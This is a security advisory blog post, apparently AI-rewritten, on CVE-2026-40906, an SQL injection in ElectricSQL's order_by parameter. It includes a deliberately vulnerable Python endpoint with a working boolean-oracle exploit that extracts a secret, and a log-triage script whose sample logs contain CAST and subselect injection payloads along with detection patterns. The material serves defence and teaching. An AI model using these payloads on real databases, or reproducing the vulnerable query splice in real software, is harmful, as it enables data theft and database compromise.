CRITICAL SQLi in ElectricSQL: Full Database Compromise
The National Vulnerability Database (NVD) has published CVE-2026-40906, a critical SQL injection vulnerability in ElectricSQL, a PostgreSQL sync engine. It affects versions 1.1.12 up to, but not including, 1.5.0, and resides in the `order_by` parameter of the `/v1/shape` API.
This is not a theoretical risk; it is a path to full database compromise. According to NVD, any authenticated user can exploit this error-based SQL injection (error-based injection extracts data through the text of the database errors returned to the client) by supplying crafted `ORDER BY` expressions, and can thereby read, write and even destroy the entire contents of the underlying PostgreSQL database. This class of bug is a familiar one: an `ORDER BY` clause cannot be bound as a query parameter, so a sort key taken from the request must be validated against an allowlist of column names before it is placed in the query; string concatenation is the classic failure. The CVSS score of 9.9 (CRITICAL) reflects a direct path to data exfiltration and integrity violation.
ElectricSQL versions 1.5.0 and later contain the fix. Organizations running ElectricSQL as a Postgres sync engine must prioritize immediate patching. A vulnerability like this is a gift to attackers: with minimal effort it hands an ordinary authenticated user whatever privileges the database role ElectricSQL connects with holds. It is also a stark reminder that APIs reachable only by authenticated users demand the same rigorous scrutiny as public-facing endpoints.
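As an added illustration, not code from ElectricSQL, from NVD or from the original article, the following Python models the bug class in miniature: a hypothetical shape endpoint that splices a caller-supplied `order_by` string into its query, beside a hardened version that accepts only allowlisted column names. SQLite stands in for PostgreSQL, and the tables, column names and secret value are constructed. The leak shown uses row order as the oracle rather than error text (a sibling technique to the error-based variant the advisory describes); the vulnerable splice it exploits is the same.

```python
import re
import sqlite3

# Constructed fixture: a table a sync "shape" legitimately exposes, plus a
# table the caller must never be able to read. SQLite stands in for PostgreSQL.
def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE items (id INTEGER PRIMARY KEY, name TEXT);
        INSERT INTO items VALUES (1, 'alpha'), (2, 'beta'), (3, 'gamma');
        CREATE TABLE secrets (id INTEGER PRIMARY KEY, api_key TEXT);
        INSERT INTO secrets VALUES (1, 'sk-live-7f3a');
    """)
    return db

# VULNERABLE (hypothetical): the caller's order_by string is spliced straight
# into the SQL. ORDER BY cannot be bound as a query parameter, so without
# validation any expression the database accepts runs with the service's rights.
def shape_query_vulnerable(db, table, order_by):
    sql = f"SELECT id, name FROM {table} ORDER BY {order_by}"
    return [row[0] for row in db.execute(sql)]

# HARDENED: accept only "<column> [ASC|DESC]" terms whose column is on a
# per-table allowlist, then re-emit them as quoted identifiers.
ALLOWED_COLUMNS = {"items": {"id", "name"}}
TERM_RE = re.compile(r"^\s*([A-Za-z_][A-Za-z0-9_]*)\s*(ASC|DESC)?\s*$", re.IGNORECASE)

def parse_order_by(table, order_by):
    allowed = ALLOWED_COLUMNS.get(table)
    if allowed is None:
        raise ValueError(f"unknown table {table!r}")
    terms = []
    for raw in order_by.split(","):
        m = TERM_RE.match(raw)
        if not m or m.group(1).lower() not in allowed:
            raise ValueError(f"rejected order_by term {raw!r}")
        direction = (m.group(2) or "ASC").upper()
        terms.append(f'"{m.group(1).lower()}" {direction}')
    return ", ".join(terms)

def shape_query_hardened(db, table, order_by):
    sql = f'SELECT id, name FROM "{table}" ORDER BY {parse_order_by(table, order_by)}'
    return [row[0] for row in db.execute(sql)]

# Attacker side: a sort expression that orders ascending when a guessed prefix
# of the secret is right and descending when it is wrong. Each request leaks
# one yes/no answer without any error message or stacked statement.
def oracle_payload(guess):
    guess = guess.replace("'", "''")
    return ("CASE WHEN (SELECT api_key FROM secrets WHERE id = 1) LIKE '"
            + guess + "%' THEN id ELSE -id END")

def leak_secret(db, alphabet="abcdefghijklmnopqrstuvwxyz0123456789-", max_len=16):
    known = ""
    for _ in range(max_len):
        for ch in alphabet:
            if shape_query_vulnerable(db, "items", oracle_payload(known + ch)) == [1, 2, 3]:
                known += ch
                break
        else:  # no character extended the prefix: end of the secret
            break
    return known

if __name__ == "__main__":
    db = make_db()
    print("leaked via vulnerable endpoint:", leak_secret(db))
    print("hardened, legitimate request :", shape_query_hardened(db, "items", "name DESC"))
    try:
        shape_query_hardened(db, "items", oracle_payload("s"))
    except ValueError as e:
        print("hardened, injected request  :", e)
```

The hardened path never lets caller text reach the SQL string: it maps each term onto a known column and a fixed direction keyword and rebuilds the clause itself, which is the only workable defence for a clause the driver cannot parameterize.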
What This Means For You
- If your organization uses ElectricSQL, check the deployed version immediately. Any version from 1.1.12 through 1.4.x is vulnerable; upgrade to 1.5.0 or later without delay. This is not a 'monitor for exploitation' scenario; it is a 'fix it now' directive. If you ran a vulnerable version, review the PostgreSQL logs for anomalous activity: Postgres records the failing statement on a STATEMENT line after each ERROR (governed by `log_min_error_statement`, default `error`), so look for ERROR entries whose statements carry `ORDER BY` expressions containing subselects, `CASE`, `CAST` or string literals rather than a plain column list, and for bursts of such errors from the role ElectricSQL connects with. Because the flaw permits full reads, treat any credentials or secrets stored in that database as potentially exposed and consider rotating them.
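To make the log-review step concrete, here is an added Python triage script (not from ElectricSQL, NVD or the original article) run over constructed PostgreSQL log lines. It pairs each ERROR entry with the STATEMENT line Postgres writes after it, extracts the `ORDER BY` clause, and flags clauses containing subselects, `CASE`, `CAST`, string literals or comment markers rather than a plain column list. The log format assumes a `log_line_prefix` of `'%t [%p] %u@%d '`; the role, table and secret values are invented.

```python
import re
from collections import Counter

# Constructed sample PostgreSQL log lines (invented data, log_line_prefix
# '%t [%p] %u@%d '). Postgres writes the failing statement on its own STATEMENT
# line after the ERROR line, so error-based injection leaves ERROR/STATEMENT
# pairs, and with CAST-style payloads the extracted value sits in the error text.
SAMPLE_LOG = """\
2026-04-22 00:16:01 UTC [4121] electric@app LOG:  connection authorized: user=electric database=app
2026-04-22 00:16:03 UTC [4121] electric@app ERROR:  invalid input syntax for type integer: "sk-live-7f3a"
2026-04-22 00:16:03 UTC [4121] electric@app STATEMENT:  SELECT "id","name" FROM "items" ORDER BY CAST((SELECT api_key FROM secrets LIMIT 1) AS integer)
2026-04-22 00:16:04 UTC [4121] electric@app ERROR:  invalid input syntax for type integer: "postgres,electric"
2026-04-22 00:16:04 UTC [4121] electric@app STATEMENT:  SELECT "id","name" FROM "items" ORDER BY CAST((SELECT string_agg(usename, ',') FROM pg_user) AS integer)
2026-04-22 00:16:09 UTC [4133] electric@app ERROR:  column "nme" does not exist
2026-04-22 00:16:09 UTC [4133] electric@app STATEMENT:  SELECT "id","name" FROM "items" ORDER BY nme DESC
2026-04-22 00:16:12 UTC [4140] electric@app LOG:  duration: 3.1 ms  statement: SELECT "id","name" FROM "items" ORDER BY name DESC
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+ \S+ \S+) \[(?P<pid>\d+)\] (?P<user>[^@\s]+)@(?P<db>\S+) "
    r"(?P<level>LOG|ERROR|FATAL|STATEMENT|DETAIL|HINT):\s+(?P<msg>.*)$")

# Constructs that have no business in a client-supplied sort key.
SUSPICIOUS_RE = re.compile(
    r"\(\s*SELECT\b|\bCASE\b|\bCAST\s*\(|::|\bpg_sleep\b|--|/\*|'",
    re.IGNORECASE)

def order_by_clause(statement):
    """Return the text after ORDER BY, or None if the statement has none."""
    m = re.search(r"\bORDER\s+BY\b(.*)$", statement, re.IGNORECASE | re.DOTALL)
    return m.group(1).strip() if m else None

def triage(log_text):
    """Pair ERROR lines with their STATEMENT lines and grade the ORDER BY clause."""
    findings = []
    pending = {}  # pid -> most recent ERROR record still waiting for its STATEMENT
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        rec = m.groupdict()
        if rec["level"] == "ERROR":
            pending[rec["pid"]] = rec
        elif rec["level"] == "STATEMENT" and rec["pid"] in pending:
            err = pending.pop(rec["pid"])
            clause = order_by_clause(rec["msg"])
            if clause is None:
                continue
            findings.append({
                "ts": rec["ts"], "pid": rec["pid"], "user": rec["user"],
                "error": err["msg"], "order_by": clause,
                "suspicious": bool(SUSPICIOUS_RE.search(clause)),
            })
    return findings

def suspicious_by_user(findings):
    """Count flagged ORDER BY errors per database role; bursts from one role stand out."""
    return dict(Counter(f["user"] for f in findings if f["suspicious"]))

if __name__ == "__main__":
    results = triage(SAMPLE_LOG)
    for f in results:
        tag = "SUSPICIOUS" if f["suspicious"] else "benign    "
        print(f'{tag} {f["ts"]} pid={f["pid"]} {f["user"]}: {f["error"]} | ORDER BY {f["order_by"]}')
    print(suspicious_by_user(results))
```

The typo in `ORDER BY nme DESC` still produces an ERROR/STATEMENT pair but is graded benign, while the two `CAST((SELECT ...))` clauses are flagged; note that in those two the error message itself carries the exfiltrated value, which is exactly why error-based injection is so efficient and why these log lines deserve the same handling as the data they contain.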
Vulnerability Summary
The table below lists no network or host observables (no hashes, addresses or request signatures); it summarizes the vulnerability itself rather than indicators of compromise.
| ID | Attribute | Value |
|---|---|---|
| CVE-2026-40906 | Vulnerable component | `order_by` parameter of the ElectricSQL `/v1/shape` API |
| CVE-2026-40906 | Affected versions | 1.1.12 up to, but not including, 1.5.0 |
| CVE-2026-40906 | Confidentiality impact | Read the full contents of the underlying PostgreSQL database |
| CVE-2026-40906 | Integrity and availability impact | Write to and destroy the full contents of the underlying PostgreSQL database |
Source & Attribution
| Field | Value |
|---|---|
| Source Platform | NVD |
| Channel | National Vulnerability Database |
| Published | April 22, 2026 at 00:16 UTC |
This content was AI-rewritten and enriched by Shimi's Cyber World based on the original source. All intellectual property rights remain with the original author.